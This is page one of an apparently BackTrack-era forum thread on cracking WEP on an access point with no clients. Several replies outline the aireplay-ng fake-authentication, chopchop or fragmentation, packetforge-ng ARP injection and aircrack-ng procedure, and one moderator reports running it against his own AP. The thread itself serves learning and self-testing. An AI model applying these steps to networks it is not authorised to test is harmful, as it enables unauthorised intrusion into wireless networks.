Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: WEP: no data packets, please explain

  1. #1
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    3

    Default WEP: no data packets, please explain

    Alright, after reading and testing many tutorials/videos over cracking WEP with no clients, I need some explanation on something.

    I noticed that almost all guides/tuts have one pre-req. It requires that you have Data packets on the network.
    Example:
    Code:
    Req: There are some data packets coming from the access point. Beacons and other management frame packets are totally useless for our purposes in this tutorial. A quick way to check is to run airodump-ng and see if there are any data packets counted for the access point. Having said that, if you have data captured from the access point from another session, then this can be used. This is an advanced topic and this tutorial does not provide detailed instructions for this case.
    If there are no clients, then how are data packets generated. It seems like all 3 methods for cracking WEP (aireplay -3, -4, -5) require some sort of data collection other than the stuff the AP generates. Is this assuming that there are clients on the wired side that could generate traffic?

    If not, is it possible to crack a COMPLETELY clientless AP? By clientless, I mean nothing connected to the wired and wireless side.

    Any information or resources would be helpful.

  2. #2
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yes
    you need to wait....that is the secret...patience...an arp will be released...can take 1 min to forever....

    have you seen our videos tuts by exploitz.....on the forum....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #3
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    3

    Default

    Thx for the reply shamanvirtuel.

    I was kind of looking for a more detailed response then just patience. I know ARP (address resolution protocol) is used to determine addresses (MAC addys in this case) for clients, maybe its my lack of knowledge of ARP, but how does an ARP packet get generated on a network without any clients.

    Basically, I'm looking for a scenario when an AP with no wireless clients and no wired connection would generate anything usable for a WEP attack.

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by ritalinkid View Post
    Basically, I'm looking for a scenario when an AP with no wireless clients and no wired connection would generate anything usable for a WEP attack.
    This would be a good start for you.

    Just as the tut explains:

    * 1 - Set the wireless card MAC address
    * 2 - Start the wireless interface in monitor mode on the specific AP channel
    * 3 - Use aireplay-ng to do a fake authentication with the access point
    * 4 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA
    * 5 - Use packetforge-ng to create an arp packet using the PRGA obtain in the previous step
    * 6 - Start airodump-ng on AP channel with filter for bssid to collect the new unique IVs
    * 7 - Inject the arp packet created in step 5
    * 8 - Run aircrack-ng to crack key using the IVs collected

    I have done this many times successfully on my AP
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Junior Member imported_seven's Avatar
    Join Date
    May 2007
    Posts
    97

    Default

    When cracking an AP with no wireless clients, you should fake authenticate. Boom, now you have a client. But don't de-auth yourself to generate arp. Use chopchop or fragmentation and then forge your own packet. I feel forging your own is the best way possible for any situation. After you forge it, inject your nice new ARP packet with arp replay.(-2).

    Good luck.

  6. #6
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    WEP: no data packets, explained

    Please keep titles descriptive of the problem, the way you wrote the title before I edited it was saying that you had a solution and not that you wanted a solution.
    This is borderline spamming, and next time will be treated as such.

  7. #7
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by ritalinkid View Post
    I was kind of looking for a more detailed response then just patience.
    Patience IS the answer. There is *nothing* you can do except wait for a data packet. If you're testing your own network, and you don't want to wait, ping a non-existent IP.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  8. #8
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    So, just out of interest, an AP with nothing attached will eventually send an ARP regardless?

    I'll give it a try and see at somepoint but I have to share my AP with my housemates and I'm not sure they'd be happy with me disconnecting the internet entirely to conduct my experiments

  9. #9
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by TrialAndError View Post
    So, just out of interest, an AP with nothing attached will eventually send an ARP regardless?

    I'll give it a try and see at somepoint but I have to share my AP with my housemates and I'm not sure they'd be happy with me disconnecting the internet entirely to conduct my experiments
    Not necessarily. You only need one "data" packet with the fragmentation or chopchop attack, which helps you obtain some keystream data. These attacks reinjection arbitrary but known data to collect more keystream data. Then you can use packetforge to create an ARP packet for injection.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  10. #10
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    FYI, I just ran the fragmentation attack against my AP, with no clients connected. It took 194 packets to get a usable 'data' packet, and it worked in obtaining the PRGA to create the ARP packet via packetforge.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •